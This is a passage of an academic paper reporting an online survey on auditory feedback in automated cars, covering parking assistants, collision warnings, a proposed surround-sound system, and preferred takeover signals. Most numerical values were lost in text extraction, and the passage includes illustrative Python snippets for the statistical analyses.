a degraded reaction time to critical events has been found among drivers exposed to acc (stanton, young & mccaulder, ; stanton et al., ; rudin-brown & parker, ; larsson, kircher & hultgren, ), and this issue is likely to be aggravated in higher levels of automated driving (de winter et al., ; strand et al., ). furthermore, it is expected that people who will be driving highly and fully automated cars will suffer from a reduction of their manual control skills, similar to pilots in highly automated airplanes (ebbatson, ; scallen, hancock & duley, ). the development of effective feedback systems is considered important in supporting the operator's sustained attention, also called vigilance (heikoop et al., submitted for publication). auditory displays as mentioned above, unless the driving task is fully automated, an appropriate feedback system is required that warns and/or informs the human when automation mode changes are required. the present study investigated the potential of auditory feedback in automated driving. the auditory modality has several important characteristics: ( ) it is omnidirectional; that is, unlike visual cues, auditory cues can be received from any direction, which is especially important in automated driving, during which the driver may not be attending to the road and dashboard; ( ) the auditory sense can receive information at almost all times; ( ) sound is transient; that is, unlike visual information, which can be continuously available, information passed in the form of sound is only available at that particular moment; ( ) although auditory cues may be masked by other sounds, humans have the ability to selectively focus on one sound when multiple streams of sound are available, also known as the cocktail party effect (bregman, ; cooke & ellis, ; hermann, hunt & neuhoff, ; wickens & hollands, ). an advantage of sound is that it is possible to use language, which may be more informative compared to the information conveyed with haptic or visual interfaces. because of the aforementioned qualities of sound, auditory displays are used in a variety of applications, especially in those cases where the user needs to be alerted or where additional visual load has to be avoided. for example, the majority of present route navigation devices use voice and sound messages to give directions to their users (holland, morse & gedenryd, ), and flight crews use auditory signals to get informed about proximate aircraft or to obtain directional information (e.g., begault, ; bronkhorst, veltman & van breda, ). an auditory interface in combination with tactile feedback was suggested in a driving simulator study (ho, reed & spence, ) as an optimal warning system for collision avoidance. the auditory modality has potential not only as a warning method, but also for providing input to the machine (e.g., speech interfaces). literature reviews (stanton & edworthy, ; barón & green, ) suggest that people drive 'better' (i.e., lower lane variation, steadier speed) when auditory interfaces are employed in a manually driven car. auditory feedback can be delivered as a pre-recorded voice or as an artificial sound warning/message. the term earcon refers to a brief auditory message (e.g., a tune or a sound of a bell) that represents a certain event or object.
earcons have been introduced to desktop computers to complement visual icons (mynatt, ; belz, robinson & casali, ; hermann, hunt & neuhoff, ). previous research has shown that a female voice is favoured over a male voice in route navigation devices (large & burnett, ). however, national or cultural differences seem to exist, where in some cases the male voice is preferred over the female voice. in , bmw supposedly had to recall its navigation system in germany because male drivers disliked the idea of following orders communicated via a female voice (takayama & nass, ), and apple recently added the option of a male voice to their voice control system siri (bosker, ). in a driving simulator study by jonsson & dahlbäck ( ), non-native speakers of english responded more accurately to route instructions provided by a female voice than to route instructions provided by a male voice. auditory systems in current vehicles: parking assistant and forward collision warning system modern vehicles often include systems that assist in driving and increase road safety. such systems support drivers by providing auditory/visual/haptic warning messages and by taking over control of some of the driving tasks. in the present survey, we investigated the opinion of people on two existing auditory systems: a parking assistant (pa) and a forward collision warning system (fcws). the first generations of pas were so-called parking sensors, which produce warning sounds (beeps) when the car gets too close to a nearby object while parking, using ultrasonic or electromagnetic sensors (bmw, ; toyota, ; volkswagen, ). some recent pa systems take over the positioning of the vehicle during parking, leaving the control of acceleration and deceleration to the driver (volkswagen, ). other pas take over control of the parking process entirely, as can be seen in the toyota prius and bmw x (bmw, ; toyota, ). a fcws is a system that provides a warning sound when a vehicle is rapidly approaching a vehicle in front. fcwss have the potential to prevent a large portion of rear-end collisions (jamson, lai & carsten, ; kingsley, ; kessler et al., ). if a potential accident is detected by the fcws, the system either gives a warning to the driver (honda, ) or engages in emergency braking and/or steers away from the object (volvo, b). most fcwss detect vehicles with the help of computer vision (srinivasa, ; dagan et al., ), an approach that is used by companies like honda and bmw (bmw, ; volvo, b; honda, ), and/or radars (volvo, b; ford, ; honda, ; mercedes-benz, ). both approaches have limitations, and the system may not issue warnings or stop the vehicle in bad weather or in other situations where the sensors are obscured by external factors. the introduction of vehicle-to-vehicle (v v) communication may increase the efficiency and capabilities of collision warning systems (e.g., miller & huang, ). eighty-eight percent of owners of volvo cars surveyed by braitman et al. ( ) reported always having the fcws turned on. it is expected that both pas and fcwss will remain in future partially and highly automated vehicles. however, these technologies will become obsolete with the introduction of fad because both parking and collision avoidance will be handled without any input from the human driver.
‘augmented/spatial’ sound system for fully automated driving
auditory warning signals will not be required in fad, because in fad the automation by definition takes care of all possible emergency conditions. this study proposes an experimental setup aimed at the three-dimensional augmentation of sound surrounding a vehicle, hereafter referred to as the ‘future system’ (fs), which could be used in fad for entertainment and comfort. three-dimensional sound is being developed as a means for providing feedback to humans (lumbreras, sánchez & barcia, ; garas, ; rozier, ; godinho, antónio & tadeu, ; dobler, haller & stampfl, ). our proposed fs filters out unwanted sounds (e.g., tire/engine noise coming from vehicles in the vicinity) and amplifies desired sounds (e.g., sound of birds singing in a park). we envision that such a system could be used in future fully automated vehicles. vehicles driving fully automatically have full control of the vehicle and must have reliable detection capabilities of the environment. drivers of such vehicles will not be required to pay attention to the processes that take place in the environment surrounding the car. hence, a spatial augmentation of sounds that a driver prefers to hear and simultaneous cancelation of unwanted sounds may enhance the pleasure of being engaged in fad. such a system will probably have to be configurable: drivers must have the option to select which sounds they want to augment and which sounds they wish to filter out, as well as to adjust the volume of these sounds.
the aim of the present survey study
as mentioned above, feedback is important in had, especially regarding transitions of control. it is relevant for the development of automated driving systems to know what types of interfaces people want and need. because automated cars do not exist yet on the consumer market, it is impossible to test such research questions in an ecologically valid environment, except through driving simulator research. the present study was undertaken from a different point of view: respondents were asked to imagine automated driving scenarios. the aim of the present study was to investigate the opinion of people on two existing auditory displays (pa & fcws) as well as the augmented sound system ‘fs’. the respondents were asked to judge two qualities of the systems (helpfulness and annoyance) and to state whether they would consider using automated versions of such systems in the future. in addition, we asked people to report their preferred type of feedback for takeover requests in had. statistical associations between self-reported driving style as measured with the driver behaviour questionnaire (dbq), yearly mileage, number of accidents, and opinions of respondents on the qualities of the proposed systems were assessed. the hypothesis that people from non-english speaking countries prefer a female voice to a male voice in automated driving systems was also tested. additionally, the respondents were asked to provide their general thoughts on the concept of automated driving in a free-response question. finally, the respondents provided their opinion on the year of introduction of fully automated driving in their country of residence.
results of these analyses were compared with findings from two previous surveys that asked questions related to other aspects of automated vehicles (de winter et al., ; kyriakidis, happee & de winter, ).
methods
survey
a survey containing questions was developed with the online tool crowdflower (www.crowdflower.com). table shows the questions of the survey as well as the corresponding coding. the full survey is included in the supplemental information. the survey was targeted towards reasonably educated persons without knowledge of automated driving. a previous survey indicated that people who work on crowdflower-based surveys mostly have undergraduate degrees (kyriakidis, happee & de winter, ). the present survey introduced in plain language three levels of driving: manual driving, partially automated driving, and fully automated driving. manual driving was referred to as "normal (non automated) cars". the explanation of partially automated driving was provided as follows: "imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). however, the automation cannot handle all possible situations, and you sometimes have to take over control". respondents were asked to imagine fully automated driving as follows: "imagine a fully automated car (no steering wheel) that drives completely on its own with no manual interaction". the survey contained questions on the person's age, gender, driving frequency, mileage, and accident involvement. the questions asking participants to provide information on their driving style were based on the violations scale of the dbq, as used by de winter ( ). the respondents were asked to express their opinion on two currently existing systems and one proposed setup that could be used during fully automated driving. specifically, we asked respondents about (1) a parking assistant (pa) in a manually driven car that produces warning sounds (beeps) when the car gets too close to a nearby object while parking, (2) a forward collision warning system (fcws) in a manually driven car that provides a warning sound when a car is rapidly approaching another car in front, and (3) a future augmented surround sound system in a fully automated vehicle (fs). the fs was described as follows: "now imagine that this fully automated car records what is happening outside and plays it via speakers inside the car, informing the occupants about the outside environment. in other words, those who sit in the car can hear what is happening outside
table all survey items. variable question full question as reported in the survey used coding instr q have you read and understood the above instructions? = yes, = no gender q what is your gender?
( = female, = male) − = i prefer not to respond, = female, = male age q what is your age? positive integer value drivefreq q on average, how often did you drive a vehicle in the last months? − = i prefer not to respond, = never, = less than once a month, = once a month to once a week, = to days a week, = to days a week, = every day kmyear q about how many kilometres (miles) did you drive in the last months? − = i prefer not to respond, = , = – , , = , – , , = , – , , = , – , , = , – , , = , – , , = , – , , = , – , , = more than , nracc q how many accidents were you involved in when driving a car in the last years? (please include all accidents, regardless of how they were caused, how slight they were, or where they happened)? − = i prefer not to respond, = , = , = , = , = , = , = more than vangered q how often do you do the following?: becoming angered by a particular type of driver, and indicate your hostility by whatever means you can. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vmotorway q how often do you do the following? disregard- ing the speed limit on a motorway. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vresident q how often do you do the following? disregard- ing the speed limit on a residential road. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vfollowing q how often do you do the following? driving so close to the car in front that it would be difficult to stop in an emergency. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vrace q how often do you do the following? racing away from traffic lights with the intention of beating the driver next to you. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month (continued on next page) bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table (continued) variable question full question as reported in the survey used coding vhorn q how often do you do the following? sounding your horn to indicate your annoyance with another road user. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vphone q how often do you do the following? using a mobile phone without a hands free kit. − = i prefer not to respond, = times per month, = to times per month, = to times per month, = to times per month, = or more times per month vmean n/a mean for q – numeric value papast q in the past month, did you drive a car with a parking assistant? − = i prefer not to respond, = i do not know, = no, = yes pahelp q a parking assistant is helpful. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly paannoy q a parking assistant is annoying. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly paopin q what do you think are the disadvantages of a parking assistant? 
textual response pafut q i would like to have a system in my car that can park the car automatically, just by pressing a button. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwspast q in the past month, did you drive a car with a forward collision warning system? − = i prefer not to respond, = i do not know, = no, = yes fcwshelp q a forward collision warning system is helpful. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwsannoy q a forward collision warning system is annoying. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwsfut q i would you like to have a system in my car that brakes automatically to avoid collisions (autonomous emergency braking). − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fcwsopin q what do you think are the disadvantages of a forward collision warning system? textual response fsannoy q i believe that this type of surround sound system would be annoying. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly (continued on next page) bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table (continued) variable question full question as reported in the survey used coding fsfut q i would prefer to use such a sound system instead of opening the window, when driving through a scenic place (for example, a national park). − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly fsopin q what would be the advantages and the disad- vantages of such sound system? textual response torint q now imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). however, the automation cannot handle all possible situations, and you sometimes have to take over control. what type of warning signal would you like to receive in case manual take over is required? = warning sound: one beep, = warning sound: two beeps, = warning sound: horn sound, = warning sound: bell sound, = warning light, = visual warning message projected on windscreen ‘take over please’, = vibrations in your seat, = vibrations in your steering wheel, = vibrations in your seatbelt, = vibrations in the floor, = female voice: ‘take over please’, = male voice: ‘take over please’, = other, = none of the above torintot q if you answered ‘other’ in the previous question, please specify what type of warning signal you would like to receive in the described scenario. textual response facpref q i would prefer to drive in a fully automated car rather than a normal (non automated) car. − = i prefer not to respond, = disagree strongly, = disagree a little, = neither agree nor disagree, = agree a little, = agree strongly yearauto q in which year do you think that most cars will be able to drive fully automatically in your country of residence? year comm q please provide any suggestions which could help engineers to build safe and enjoyable automated cars. 
textual response survtime survey time (derived from results generated by crowdflower) seconds
even when their windows are closed. sound volume in such system could be adjusted; particular noise (for example sound coming from another vehicle) could be filtered out. such a system could, for example, be used during a leisure drive through a park on a hot day". illustrations belonging to the three scenarios (i.e., pa, fcws, fs) were used in the survey (fig. ); no auditory examples were used. the illustrations were uploaded to a remote site so that they could be embedded into the survey. the supplemental information contains the xml code used to create the survey; if one wishes to add images to a crowdflower survey, the suggested method could be used. the respondents were asked to indicate disadvantages of the pa (q ) and fcws (q ) and to indicate advantages and disadvantages of the fs (q ) by means of textual responses.
figure illustrations belonging to the three scenarios presented to the respondents. (a) parking assistant (pa); (b) forward collision warning system (fcws); (c) future system (fs).
the respondents also had the opportunity to indicate the preferred mode of feedback for receiving a takeover request (q & q ). in the last question (q ), they were asked to "provide any suggestions, which could help engineers to build safe and enjoyable automated cars". giving a response to this last free-response question was optional. all examples of given comments shown in this article are direct quotes from the responses; no grammatical or syntactic errors were corrected. the respondents had to complete all questions (except q & q ), and each question had an i prefer not to respond response option.
configuration of crowdflower
in the instructions, the respondents were informed that they would need approximately min to complete the survey. the task expiration time was set to min. contributors from all countries were allowed to participate in the survey, in order to collect data from as large and diverse a population as possible. moreover, the lowest level of experience of contributors, 'level contributors', was selected. this level of experience accounts for % of completed work on crowdflower. as a result, the survey was available to a large number of workers, which allowed reaching a relatively diverse group of users of the platform. completing the survey more than once from the same ip address was allowed (note, however, that multiple responses from the same ip address were filtered out in our analyses, see the results section). for the completion of the survey a payment of $ . was offered, and , responses were collected. the study was preceded by a pilot test with respondents. the pilot test did not lead to any changes in the survey, and these respondents were not included in the analysis.
analyses
descriptive statistics (i.e., mean, median, standard deviation, skewness, and number of responses) were calculated for each of the variables. the skewness was calculated as the third central moment divided by the cube of the standard deviation. a spearman correlation matrix among the variables was created. the first author manually performed the analysis of textual responses (q , q , q , q , & q ).
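the article states that the data were analysed with a matlab script (included in the supplemental information). purely as an illustrative sketch, and not the authors' code, the following python snippet mirrors the analysis steps just described: per-variable descriptive statistics, with skewness computed as the third central moment divided by the cube of the standard deviation, and a spearman correlation matrix. the data frame, its column names, and its values are hypothetical.

import numpy as np
import pandas as pd

def skewness(x):
    # third central moment divided by the cube of the (population) standard
    # deviation, as described in the analyses subsection
    x = np.asarray(x, dtype=float)
    m3 = np.mean((x - x.mean()) ** 3)
    return m3 / np.std(x) ** 3  # np.std uses ddof=0 (population SD) by default

def describe(df):
    # mean, median, SD, skewness and number of responses for each variable
    return pd.DataFrame({
        "mean": df.mean(),
        "median": df.median(),
        "sd": df.std(),
        "skewness": df.apply(skewness),
        "n": df.count(),
    })

# hypothetical coded survey responses, one column per item
df = pd.DataFrame({
    "age": [23, 31, 45, 27, 52],
    "pahelp": [5, 4, 4, 3, 5],
    "paannoy": [2, 1, 3, 2, 1],
})

print(describe(df))
print(df.corr(method="spearman"))  # spearman correlation matrix among the variables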
crowdflower automatically provides the respondent’s country based on his/her ip address. we analysed the preferences of people from english speaking countries, as defined by the uk government (uk visas & immigration, : antigua and barbuda, australia, bahamas, barbados, belize, canada, dominica, grenada, ireland, jamaica, new zealand, saint lucia, trinidad and tobago, united kingdom, and the united states) versus bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. non-english speaking countries regarding the use of a male or female voice for supporting takeover requests during highly automated driving. supplemental information contains the matlab script used to analyse the data. ethics statement all data were collected anonymously. the research was approved by the human research ethics committee (hrec) of the delft university of technology. documented informed consent was obtained via a dedicated survey item asking whether the respondent had read and understood the survey instructions. results number of respondents and respondent satisfaction in total, , surveys were completed. the responses were gathered on september between : and : (cet). the survey received an overall satisfaction rating of . out of . . additionally, the respondents ranked clearness of the instructions as . / . , fairness of the questions as . / . , easiness of the survey as . / . , and the offered payment as . / . . data filtering the respondents who indicated they had not read the instructions (n = ), who indicated they were under and thereby did not adhere to the survey instructions (n = ), who chose the i prefer not to respond or i do not know options in one or more of the multiple choice questions (n = ), who indicated they never drive (n = ), or who indicated they drive km per year (n = ) were excluded from the analyses. since no limitations were applied on the number of responses that could be generated per ip address, some people completed the survey more than once. such behaviour was seen as an indication that these persons participated in the survey primarily because of monetary gain. thus, we applied a strict filter, and all data generated from non-unique ip addresses were removed (n = ). in total, surveys were removed, leaving , completed surveys for further analysis. for the question “in which year do you think that most cars will be able to drive fully automatically in your country of residence?”, non-numeric responses (e.g., a year complemented by words such as “maybe ”, or “never”) and answers before the year were excluded, leaving , numeric responses. analyses at the individual level the , respondents were from countries (all , responses were associated with countries). descriptive statistics for all variables are listed in table . the respondents took on average . min to complete the survey (sd = . min, median = . min). the supplemental information contains the entire spearman correlation matrix. the correlation coefficients between variables that related to questions about the pa, fcws, and fs (papast, pahelp, paannoy, pafut, fcwspast, fcwshelp, fcwsannoy, fcwsfut, fsannoy, & fsfut) on the one hand, and age, drivefreq, kmyear, nracc, the bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . 
/peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table descriptive statistics for the survey items (n = , ). the response option “i don’t know” was omitted for the variables papast and fcwspast. variable mean median sd skewness min max gender . . − . age . . . drivefreq . . − . kmyear . . . nracc . . . vangered . . . vmotorway . . . vresident . . . vfollowing . . . vrace . . . vhorn . . vphone . . . vmean . . . . . papast . . . pahelp . . − . paannoy . . . pafut . . − . fcwspast . . . fcwshelp . . − . fcwsannoy . . . fcwsfut . . − . fsannoy . . − . fsfut . . − . facpref . . − . yearauto , . , . . , , survtime . . . , dbq variables (vangered, vmotorway, vresident, vfollowing, vrace, vhorn, & vphone), yearauto, and survtime, on the other, were overall small, between − . and . . the respondents’ mean and median age were . and years, respectively. figure shows the distribution of the respondents in -year wide age groups. . % of the respondents were male ( men vs. women). the frequencies of the answers are provided in table . figure shows that the respondents expected most cars to be able to drive in fully automated mode in their countries of residence around , (median response), with a highly skewed distribution. the respondents were asked to provide their opinion on two characteristics of the pa and fcws systems, annoyance and helpfulness, and whether they would be willing to have automated versions of such systems in their own cars (q for the pa & q for the fcws), all questions on a scale from (disagree strongly) to (agree strongly). figure shows the results for these questions. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table frequencies of answers. variable gender drivefreq kmyear nracc vangered vmotorway vresident vfollowing vrace vhorn vphone papast pahelp paannoy pafut fcwspast , fcwshelp fcwsannoy fcwsfut fsannoy fsfut facpref figure distribution of the age of the respondents aged between and years. figure shows associations between the opinion of the respondents on annoyance and helpfulness of the pa and fcws and their age divided into -year wide bins. figure a shows that younger respondents found that both the pa (ρ = − . ,p = . ) and the fcws (ρ = − . ,p < . ) were more annoying, but these effects were weak. the bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure distribution of responses for the question: “in which year do you think that most cars will be able to drive fully automatically in your country of residence?” (q ). years were divided into -year-wide bins. figure opinion of the respondents on whether a pa and fcws are helpful and annoying, and whether they would like to have automated versions of such systems in their cars in the future. spearman correlation between the respondents’ age and the reported annoyance of the fs was weak as well (ρ = . ,p = . ). figure b shows that the perceived helpfulness of the fcws (ρ = . ,p < . ) slightly increased with age. people who found the pa annoying typically indicated that the fcws was also annoying (ρ = . , p < . ), and respondents who thought that the pa was helpful, considered the fcws to be helpful as well (ρ = . ,p < . ). figure shows the respondents’ opinion on the proposed future system. 
the respondents were asked whether they would find such a system annoying (q ) and whether they would prefer to use such a system instead of opening windows while driving in a fully automated car through a scenic place (q ). a large portion of the respondents was neutral in their responses: people chose the option neither agree nor disagree in q , and persons chose the same option in q .
figure opinion on the annoyance and helpfulness of the parking assistant (pa), forward collision warning system (fcws), and future system (fs). (a) opinion on the annoyance of the pa (q ), fcws (q ), and fs (q ) as a function of age; (b) opinion on the helpfulness of the pa (q ) and fcws (q ) as a function of age. age was divided into -year-wide bins.
figure distribution of opinions on whether the proposed future system (fs) would be annoying (q ) and whether the respondents would prefer the system to opening windows in fully automated cars (q ).
in q the respondents were asked to report on the types of feedback that they would like to be supported by in case of a takeover request during highly automated driving. the respondents were allowed to select multiple options. figure shows that a large number of people preferred auditory feedback provided by a female voice saying 'take over please' (n = ). the number of respondents who chose the option with the male voice was considerably lower (n = ). figure makes a distinction between the numbers of female and male respondents.
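the figure caption that follows defines the 'risk ratio' as the proportion of female respondents who indicated an answer divided by the proportion of male respondents who indicated that answer, with % confidence intervals; the same statistic is used further below for the comparison between english and non-english speaking countries. as a minimal sketch of how such a ratio and an approximate confidence interval could be computed: the log-normal (katz) approximation used here is an assumption, since the article does not state which interval method was applied, and the counts in the example are made up.

import math

def risk_ratio_ci(x1, n1, x2, n2, z=1.96):
    # x1 of n1 respondents in group 1 chose the option; x2 of n2 in group 2
    # returns the risk ratio of group 1 relative to group 2 and an
    # approximate 95% confidence interval (log-normal / Katz method)
    p1, p2 = x1 / n1, x2 / n2
    rr = p1 / p2
    se_log_rr = math.sqrt(1 / x1 - 1 / n1 + 1 / x2 - 1 / n2)
    lo = math.exp(math.log(rr) - z * se_log_rr)
    hi = math.exp(math.log(rr) + z * se_log_rr)
    return rr, lo, hi

# illustrative numbers only (the survey counts are not reproduced here):
# 40 of 120 respondents in one group vs. 300 of 900 in the other
print(risk_ratio_ci(40, 120, 300, 900))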
furthermore, the results seem to suggest that female respondents were less likely than male respondents to prefer a female voice. figure shows the opinion of the respondents on the combinations of warning signals. the figure shows that most people (n = ) preferred a sound signal (i.e., one or two beeps, a horn, or bell) without additional information. a large number of people indicated that they would like to receive a combination of all four modalities (n = ) or the combination of a sound signal, a visual message, and a voice (n = ). cross-national differences in opinion for feedback for takeover requests next, we tested the hypothesis whether peoples’ preference for a female and male voice in supporting takeover requests in highly automated driving was different between english and non-english speaking countries. figure presents a scatter plot, showing the numbers bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure preference to combinations of types of signals for aiding takeover requests during highly automated driving (q ). all possible combinations are listed. hence, the total number of respondents adds up to , . figure numbers of respondents from english and non-english speaking countries who indicated a preference for a male and a female voice for a takeover request during highly automated driving (q ). the dashed line represents the ratio between the number of respondents who preferred a female voice and the number of respondents who preferred a male voice. the solid line is the line of unity. no labels are shown for countries with five or less respondents indicating a male voice, to support the clarity of the figure. country abbreviations are listed according to iso - alpha- . of respondents per country who indicated that they would like to receive a female or a male voice. the overall percentage of respondents who expressed preference for a female voice was % ( / , ), and the overall percentage of people who expressed preference for a male voice was % ( / , ). the corresponding percentages were % ( / ) and % ( / ) for english speaking countries, and they were % ( / , ) and % ( / , ) for non-english speaking countries. the differences between english speaking countries and non-english speaking countries were not statistically significant (female voice: rr = . , % ci [ . – . ]; male voice: rr = . , % ci [ . – . ]). bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. analyses of textual comments the respondents provided their feedback on the disadvantages of the pa in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were ignored. comments were processed before data filtering and were hence based on all , responses. . % of the respondents (n = ) provided negative feedback on the auditory interfaces in parking assistants. many people (n = ) indicated that pa systems were annoying, for example: “sound should not be too loud and annoying” and “i think it could be annoying especially when your focusing”. thirty-seven respondents pointed out that the pa used overly loud sounds. several answers to the question contained comments that the pa sounds can be distracting (n = ) and inaccurate (n = ). 
five respondents indicated that they would prefer feedback in other types of modalities, for example: "annoying, use something else instead of the constant loud beeping sounds" and "the sound, a voice message would be better". five respondents indicated that the pa systems cannot be used by deaf people. the respondents indicated their opinion on the disadvantages of the fcws in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were not included in the analysis. sixteen respondents indicated that the auditory feedback used in fcws was annoying, for example: "this situation might come up too often so the warning sound may get annoying fast" and "the beeps might feel annoying". next, the respondents were asked to comment on possible advantages and disadvantages of the fs in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were not included in the analysis. in total, , comments were analysed. a collection of mixed responses was received. overall, more comments about the fs were classified as positive (n = ) than negative (n = ). however, the respondents also pointed out concerns about a number of characteristics that they associated with the system: annoyance to both the driver and other road users in traffic (n = ), distraction (n = ), and loudness (n = ). fifty-five respondents expressed concerns that the system would be impractical; however, most such concerns could be associated with a lack of understanding of the concept of a fully automated car. certain respondents showed a high level of negativity caused by an apparent lack of understanding of the concept of filtering only specific sounds coming from the outside environment. examples are: "you can not hear some bells or signal from other cars", "main disadvantage: makes driver unaware of any dangers", "if car noises are filtered out how would you hear if another car is incoming", and "i feel that filtering other car noise may be dangerous". in q the respondents were asked to indicate their preference for types of interfaces to be used for takeover requests in had. one of the options in that question was "other". if respondents selected this option, they were invited to provide further comments in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were ignored. in total, responses were analysed. one respondent indicated that he/she would prefer to be aided by continuous beeps until he/she reclaimed control. another respondent stated "steering wheel up or down motion to signal steering wheel usage needed, accompanied by a specific message". one respondent mentioned that interfaces used in such a scenario need to be adaptive depending on the urgency of the request: "it honestly depends on the situation the car needs me to take over for. does it affect anyone's safety at all? does it actually /need/ to be done straight away? is it critically important in any other way? in those cases i'd obviously like a very noticeable signal however 'annoying' it may be. in other situations however i'd prefer a decent text message or a gentle reminder".
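as described above, free-text responses shorter than five characters were ignored, and the remaining comments were classified manually by the first author. purely as an illustration of such a pre-filtering step (not the authors' procedure), a small python sketch could drop near-empty responses and produce a rough keyword tally before manual coding; the theme keywords and one of the example inputs below are chosen for illustration only, the other inputs are quoted from the article.

def keep_comment(text, min_len=5):
    # drop empty or near-empty free-text responses, mirroring the rule that
    # responses shorter than five characters were ignored
    return isinstance(text, str) and len(text.strip()) >= min_len

comments = [
    "sound should not be too loud and annoying",
    "n/a",
    "the beeps might feel annoying",
    "i think it could be annoying especially when your focusing",
]

kept = [c for c in comments if keep_comment(c)]

# rough keyword tally as a first pass before manual classification
themes = ["annoy", "loud", "distract"]
counts = {t: sum(t in c.lower() for c in kept) for t in themes}
print(len(kept), counts)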
discussion the aim of this study was to obtain opinions on preferred feedback types for takeover requests in had from a large number of people coming from all over the globe. additionally, the aim was to measure perceived helpfulness and annoyance of auditory interfaces for three systems. specifically, the respondents who participated in the survey were presented with two existing systems used in modern vehicles (a parking assistant [pa] & a forward collision warning system [fcws]) and one futuristic setup (fs) envisioned for fad. respondents were asked whether they would consider using the proposed fs in future automated vehicles. our survey helped us to gather opinions from people before technology is actually available. previous research suggests that the modality of aiding systems in automated cars should be chosen carefully to avoid frustration of people who will be using such vehicles and to increase safety of automation on public roads. stanton, young & mccaulder ( ) expressed concerns that interfaces currently employed in acc do not support the understanding of the behaviour and limitations of the system. a driving simulator study by adell et al. ( ) provided a comprehensive analysis of combinations of interfaces for supporting safe driving. participants in that study were most positive about the haptic interface, while the auditory warning signals were not highly appreciated, which may be explained by the nature of the experiment that exposed the participants to a high urgency scenario of avoiding rear-end collisions (adell et al., ). findings from the aviation field show that the female voice is more difficult to understand in noisy environments (nixon et al., a). it has also been argued that the female voice has the advantage that it stands out more in a predominantly male environment, such as the military (noyes, hellier & edworthy, ). differences in speech intelligibility and perceived urgency between male and female voices are generally small and findings have been mixed (e.g., arrabito, ; edworthy, hellier & rivers, ; nixon et al., b). however, it has been found that most people normally use a female voice when using their route navigation device (large & burnett, ). in the present research, respondents were asked to select the types of interfaces they are willing to be guided by during a takeover request. the results of our survey further showed that the female voice is preferred in both english and non-english speaking countries. thus, our findings reinforce the idea that the overall most preferred way to support the transition of control is an auditory instruction performed with a female voice. note that determining the language of respondents based on their ip address cannot guarantee accurate results in all cases. in future surveys adding a question prompting for the participant’s spoken language may yield more accurate results. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. it was found that the participants showed a relatively low level of appreciation of vibratory interfaces, which contrasts with the findings in adell et al. ( ). this could be due to the fact that only a small number of systems that feature vibratory feedback are available in modern vehicles. a relatively large number of people indicated that they would like to be aided by all four proposed modalities. 
in addition, a large number of respondents indicated that the combination of a sound signal, a visual message, and a vibration signal would be preferable during takeover requests in highly automated driving. this is a surprising finding as such a combination is not common in current cars. a possible explanation of this finding could be that the respondents misinterpreted the question and instead of indicating their preference for multimodal feedback, expressed their preferences for the types of feedback that can be used separately from each other during takeover requests in highly automated driving. another limitation of the present study is that we did not vary possible parameters of the feedback signals, including the quality, intensity, timing, and speed of delivery of the takeover requests. future experimental research could investigate the effects of such parameters. the existing systems—the pa and fcws—received favourable ratings, which may not be surprising, since these systems have already been tested and are already available on the market. one limitation in this context is that the participants relied on a narrative description, complemented with a visual illustration; the survey did not contain actual examples of auditory cues. before the initiation of the survey, it was believed that the proposed fs would be seen as a way to enhance the enjoyment of driving a car through a scenic place. the results showed that the participants were rather sceptical about such a concept: the system was perceived as somewhat annoying, with a mean score of . to question q on the scale from disagree strongly ( ) to agree strongly ( ). the proposed fs was not highly rated, possibly because the concept was perceived as a bad idea, because of a lack of previous experience with such system, or because people could not envision it due to the lack of a realistic representation (see also the analysis of the textual comments). it should also be noted that a large proportion of respondents selected the middle option neither agree nor disagree, possibly indicating difficulties with understanding the concept of the proposed system (for studies into middle category endorsement, see kulas, stachowski & haynes, ; kulas & stachowski, ; sturgis, roberts & smith, ). small effects of age on the acceptance of fad were previously reported by payre, cestac & delhomme ( 